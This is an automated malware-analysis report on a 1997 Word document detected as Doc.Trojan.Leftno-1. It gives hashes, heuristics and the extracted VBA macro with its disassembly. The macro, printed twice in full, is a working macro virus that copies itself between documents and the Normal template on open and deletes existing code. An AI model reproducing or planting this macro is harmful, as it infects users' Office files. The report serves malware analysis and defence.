Office (OLE) malware analysis — malicious · 8353ef7b6d757b0d

MALICIOUS

Office (OLE)

31.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 60d1e4878a912e066b9c615820ef0dd0 SHA-1: 36eb56882ba29d8c55ef33876f1b1d52d3dc818b SHA-256: 8353ef7b6d757b0d000312a1fa58d34408b47fcf0e553b06a24db4aba9fce454

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The `Document_Open` macro is designed to overwrite itself with a hardcoded payload, indicating an attempt to execute malicious code upon opening. The ClamAV detection as 'Doc.Trojan.Leftno-1' further supports its malicious nature. The macro's obfuscated nature and the lack of clear network indicators prevent a higher confidence score.

Heuristics 3

ClamAV: Doc.Trojan.Leftno-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Leftno-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2088 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2088 bytes
SHA-256: `627ac9cba622b2977b4633e7782c03e84d1c6baeae3606dd6e90e0fddd77cf12`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open(): If Left(MacroContainer, 2) = "No" Then Set H = NormalTemplate.VBProject.VBComponents(1).CodeModule: Set NH = ActiveDocument.VBProject.VBComponents(1).CodeModule Else Set H = ActiveDocument.VBProject.VBComponents(1).CodeModule: Set NH = NormalTemplate.VBProject.VBComponents(1).CodeModule If NH.countoflines <> 3 Then NH.deletelines 1, NH.countoflines: S = H.lines(1, 3): NH.Addfromstring S End Sub ' Processing file: /opt/analyzer/scan_staging/6c9bc520de23460fb2092df116b6e066.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1499 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' BoS 0x0000 ' Ld MacroContainer ' LitDI2 0x0002 ' ArgsLd LBound 0x0002 ' LitStr 0x0002 "No" ' Eq ' If ' BoSImplicit ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set H ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set NH ' Else ' BoSImplicit ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set H ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set NH ' EndIf ' Line #1: ' Ld NH ' MemLd countoflines ' LitDI2 0x0003 ' Ne ' If ' BoSImplicit ' LitDI2 0x0001 ' Ld NH ' MemLd countoflines ' Ld NH ' ArgsMemCall deletelines 0x0002 ' BoS 0x0000 ' LitDI2 0x0001 ' LitDI2 0x0003 ' Ld H ' ArgsMemLd lines 0x0002 ' St S ' BoS 0x0000 ' Ld S ' Ld NH ' ArgsMemCall Addfromstring 0x0001 ' EndIf ' Line #2: ' EndSub

SHA-256: 627ac9cba622b2977b4633e7782c03e84d1c6baeae3606dd6e90e0fddd77cf12

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): If Left(MacroContainer, 2) = "No" Then Set H = NormalTemplate.VBProject.VBComponents(1).CodeModule: Set NH = ActiveDocument.VBProject.VBComponents(1).CodeModule Else Set H = ActiveDocument.VBProject.VBComponents(1).CodeModule: Set NH = NormalTemplate.VBProject.VBComponents(1).CodeModule
If NH.countoflines <> 3 Then NH.deletelines 1, NH.countoflines: S = H.lines(1, 3): NH.Addfromstring S
End Sub

' Processing file: /opt/analyzer/scan_staging/6c9bc520de23460fb2092df116b6e066.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1499 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	Ld MacroContainer 
' 	LitDI2 0x0002 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0002 "No"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set H 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NH 
' 	Else 
' 	BoSImplicit 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set H 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set NH 
' 	EndIf 
' Line #1:
' 	Ld NH 
' 	MemLd countoflines 
' 	LitDI2 0x0003 
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	Ld NH 
' 	MemLd countoflines 
' 	Ld NH 
' 	ArgsMemCall deletelines 0x0002 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0003 
' 	Ld H 
' 	ArgsMemLd lines 0x0002 
' 	St S 
' 	BoS 0x0000 
' 	Ld S 
' 	Ld NH 
' 	ArgsMemCall Addfromstring 0x0001 
' 	EndIf 
' Line #2:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.